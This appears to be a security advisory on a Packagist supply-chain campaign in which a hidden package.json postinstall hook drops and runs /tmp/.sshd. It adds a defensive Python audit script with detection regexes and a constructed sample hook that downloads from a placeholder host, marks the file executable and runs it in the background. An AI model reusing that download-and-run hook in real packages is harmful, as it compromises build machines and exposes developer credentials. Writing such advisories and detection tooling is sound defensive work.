Last updated: July 5, 2026 at 9:01 AM UTC

Packagist supply-chain attack hits 8 Composer packages with cross-ecosystem package.json hook downloading Linux binary to /tmp/.sshd

Socket has detailed a coordinated supply-chain campaign that planted malicious code in eight Composer packages on Packagist: moritz-sauer-13/silverstripe-cms-theme, crosiersource/crosierlib-base, devdojo/wave, devdojo/genesis, katanaui/katana, elitedevsquad/sidecar-laravel, r2luna/brain, and baskarcm/tzi-chat-ui. The attackers placed the payload not in composer.json but in a package.json shipped inside the PHP package, so teams that scan only their PHP dependency manifests miss the Node.js lifecycle hook bundled with them. The postinstall script downloads a Linux binary from a GitHub Releases URL under github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f, saves it as /tmp/.sshd, marks it executable, and runs it in the background. Socket found the same payload referenced in 777 GitHub files, including two GitHub Actions workflows, which points to a broader campaign than these eight packages.

Check
Audit composer.lock across PHP projects for the 8 affected packages installed since 2026-05-20, and audit every package.json in those trees (vendor/ included) for preinstall, install, postinstall and prepare scripts that download and execute content. Block egress to github[.]com/parikhpreyash4/* and check Linux build hosts for /tmp/.sshd on disk and for any running process whose executable is /tmp/.sshd.
Affected
Any project that installed moritz-sauer-13/silverstripe-cms-theme, crosiersource/crosierlib-base, devdojo/wave, devdojo/genesis, katanaui/katana, elitedevsquad/sidecar-laravel, r2luna/brain, or baskarcm/tzi-chat-ui via Composer. The hook is hidden in package.json, so PHP-only scanners miss it. Note that Composer itself does not execute npm lifecycle scripts: the postinstall hook fires when a Node package manager (npm, yarn or pnpm) processes that package.json, which makes hosts that run both Composer and a Node install, such as CI and front-end build machines, the place to look first.
Fix
Roll affected packages back to known-clean versions and pin them via composer.lock and package-lock.json. Treat any host where the hook ran as compromised, since the dropped binary executes with the installing user's privileges: rotate developer and CI credentials reachable from affected hosts. Scan PHP repos for package.json lifecycle hooks, not just composer.json, and add that check to CI.
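As an added example that is not Socket's tooling and not code from any of the affected packages, the following Python script implements the Check and Fix steps above: it lists affected packages from composer.lock, flags download-and-execute lifecycle hooks in every package.json under a project tree (vendor/ included), greps GitHub Actions workflows for the payload repository path, and reports whether /tmp/.sshd exists. The composer.lock and package.json samples embedded in it are constructed: the "0.0.0-sample" versions are not real releases, and the postinstall command with its example.invalid URL is a placeholder that mimics the described behaviour, not the real payload string.

```python
"""Audit a PHP project tree for the Packagist packages named above and for
download-and-execute npm lifecycle hooks hidden in any package.json.
Added example, not Socket's tooling; the sample inputs are constructed."""
from __future__ import annotations

import json
import re
import sys
from pathlib import Path

# Package names exactly as listed in the advisory.
AFFECTED_PACKAGES = {
    "moritz-sauer-13/silverstripe-cms-theme",
    "crosiersource/crosierlib-base",
    "devdojo/wave",
    "devdojo/genesis",
    "katanaui/katana",
    "elitedevsquad/sidecar-laravel",
    "r2luna/brain",
    "baskarcm/tzi-chat-ui",
}

# Repository path the advisory names as the payload source (defanged there).
INDICATOR_REPO = "github.com/parikhpreyash4/"

# npm runs these automatically during `npm install`; Composer never reads them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for the described behaviour: fetch, drop under /tmp, chmod, background.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b|https?://")
DROP_RE = re.compile(r"/tmp/\S+")
EXEC_RE = re.compile(r"chmod\s+(?:[ugoa]*\+x|[0-7]{3,4})|\bnohup\b|\s&\s*(?:$|;)")


def affected_in_lock(lock_text: str) -> list[tuple[str, str]]:
    """(name, version) for every affected package pinned in a composer.lock."""
    lock = json.loads(lock_text)
    hits = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") in AFFECTED_PACKAGES:
                hits.append((pkg["name"], pkg.get("version", "?")))
    return hits


def suspicious_hooks(package_json_text: str) -> list[tuple[str, str, list[str]]]:
    """(hook, command, reasons) for lifecycle scripts that look like droppers
    or that reference the advisory's payload repository."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = []
        if INDICATOR_REPO in cmd:
            reasons.append("references known payload repository")
        if DOWNLOAD_RE.search(cmd):
            reasons.append("downloads remote content")
        if DROP_RE.search(cmd):
            reasons.append("writes under /tmp")
        if EXEC_RE.search(cmd):
            reasons.append("chmod or background execution")
        # A lone URL in a script is common noise: report on the known indicator
        # or on at least two behavioural signals together.
        if INDICATOR_REPO in cmd or len(reasons) >= 2:
            findings.append((hook, cmd, reasons))
    return findings


def scan_tree(root: str) -> dict:
    """Walk a project tree (vendor/ and node_modules/ included) and collect
    affected packages, suspicious hooks and workflows naming the payload repo."""
    base = Path(root)
    report = {"affected": [], "hooks": [], "workflow_refs": []}
    for lock in base.rglob("composer.lock"):
        try:
            for name, version in affected_in_lock(lock.read_text(errors="replace")):
                report["affected"].append((str(lock), name, version))
        except (ValueError, AttributeError):  # malformed lock file
            continue
    for pj in base.rglob("package.json"):
        try:
            for hook, cmd, reasons in suspicious_hooks(pj.read_text(errors="replace")):
                report["hooks"].append((str(pj), hook, cmd, reasons))
        except (ValueError, AttributeError):  # malformed package.json
            continue
    for wf in base.glob(".github/workflows/*.y*ml"):
        if INDICATOR_REPO in wf.read_text(errors="replace"):
            report["workflow_refs"].append(str(wf))
    return report


def dropper_present(tmp_dir: str = "/tmp") -> bool:
    """True if the advisory's drop path (/tmp/.sshd) exists on this host."""
    return (Path(tmp_dir) / ".sshd").exists()


# Constructed samples: placeholder versions and a placeholder URL, not the real payload.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "0.0.0-sample"},
        {"name": "devdojo/wave", "version": "0.0.0-sample"},
    ],
    "packages-dev": [{"name": "r2luna/brain", "version": "0.0.0-sample"}],
})
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "sample-theme",
    "scripts": {
        "build": "vite build",
        "postinstall": "curl -fsSL https://example.invalid/helper -o /tmp/.sshd "
                       "&& chmod +x /tmp/.sshd && /tmp/.sshd &",
    },
})

if __name__ == "__main__":
    print(affected_in_lock(SAMPLE_COMPOSER_LOCK))
    print(suspicious_hooks(SAMPLE_PACKAGE_JSON))
    if len(sys.argv) > 1:  # usage: python audit.py /path/to/php/project
        print(scan_tree(sys.argv[1]))
    print("/tmp/.sshd present:", dropper_present())
```

Run it with a project path to walk the whole tree; without one it only exercises the constructed samples. The hook heuristic deliberately requires two behavioural signals (or the known repository path) so that a script that merely echoes a URL is not reported; tune the regexes to your own build conventions before wiring this into CI.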